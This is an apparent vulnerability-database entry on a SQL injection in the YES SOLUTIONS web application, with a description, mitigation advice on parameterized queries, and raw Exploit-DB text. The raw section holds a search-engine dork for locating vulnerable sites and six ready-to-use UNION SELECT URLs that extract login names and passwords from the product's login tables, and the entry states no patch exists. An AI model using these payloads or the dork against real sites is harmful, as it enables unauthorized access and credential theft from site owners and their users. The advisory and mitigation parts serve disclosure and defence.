Vendor: YES SOLUTIONS
By: HackXBack
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: YES SOLUTIONS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

SQL Injection Vulnerability in YES SOLUTIONS

A SQL injection vulnerability exists in YES SOLUTIONS: the web application's ‘id’ parameter is used unsafely in a database query, so an attacker can inject SQL through it by sending a crafted value for that parameter. The injected query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Validate and filter all user-supplied input before it is used in a SQL query, and use parameterized queries so that input is bound as data rather than concatenated into the statement. Input validation alone narrows the attack surface; parameterization is what removes the injection.
Source (Exploit-DB raw data):

####################################################################
.:. Author : HackXBack [h-b@usa.com] Lebanese Hacker

.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : YES SOLUTIONS [http://www.yessolutions.biz/files/index.php]

.:. Bug Type : Sql Injection
.:. Dork : "Powered by: Yes Solutions"

####################################################################

===[ Exploit ]===

http://server/path/file.php?id=null[SQL]

===[ Example ]===

http://site.com/files/services.php?id=-34%20union%20select%201,2,concat%28login,0x3a,password%29,4,5,6+from+login_table+where%20login_id=1

http://site.com/latest_news.php?id=-3%20union%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8+from+login

http://site.com/files/company.php?cat_id=-2%20union%20select%201,group_concat%28Login_Name,0x3a,Password%29,3,4,5,6,7,8+from+login_table

http://site.com/files/product_detail.php?item_id=-122%20union%20select%201,2,3,group_concat%28Login_Name,0x3a,Password%29,5,6,7,8,9+from+login_table

http://site.com/files/product.php?cat_id=-29 union select 1,group_concat(login,0x3a,password),3,4,5,6,7+from+login_table

http://site.com/files/detail.php?id=34&page_id=-3%20union%20select%201,group_concat%28login,0x3a,password%29,3,4,5,6+from+login_table

####################################################################